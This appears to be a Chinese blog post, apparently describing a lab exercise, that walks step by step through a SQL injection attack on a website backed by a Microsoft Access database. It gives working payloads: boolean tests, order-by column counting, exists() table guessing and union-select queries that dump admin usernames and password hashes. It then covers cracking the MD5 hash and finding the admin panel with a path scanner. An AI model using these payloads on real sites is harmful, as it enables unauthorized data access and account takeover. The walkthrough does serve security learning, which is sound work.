ACCESS 注入实战

简介

        Access数据库注入攻击是一种常见的网络安全,通过注入SQL代码来获取未授权的数据访问权限。这种攻击利用了应用程序与数据库之间的交互漏洞,攻击者通过输入特定的SQL代码片段来操纵数据库查询,从而绕过应用程序的安全机制,获取信息或执行操作。

 以下是具体的操作流程:

1、打开⽹⻚判断是否存在注⼊

使用命令 ?id=14 and 1=1  确定为数字注入

2、使用order by判断列数

当order by 7的时候⻚⾯正常

order by 8的时候⻚⾯报错

最终确定有7列

3、判断表名

  使用语句  ?id=14 and exists(select * from 表名 )

测试不同的表名确定数据是否正确

最终确定为 administrator

4、确定回显位置

使用语句   ?id=14 union select 1,2,3,4,5,6,7 from administrator

 确定回显点位为  2、3、5、7

5、确定用户名及其密码

测试不同的用户名及密码名

使用语句  ?id=14 union select 1,用户名,密码,4,5,6,7 from administrator

这里确定为 user_name 、 password

使用语句为  ?id=14 union select 1,user_name,password,4,5,6,7 from administrator

6、MD5爆破解密

进入MD5页面,输入加密密码,进行解密

加密码为   21232f297a57a5a743894a0e4a801fc3

确定密码为 admin

7、使用御剑工具获取进入后台的路径

点击第一个路径即可进入后台

8、登录后台

输入账户密码即可

安全

网络安全靠人民,网络安全为人民

 

  • 5
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值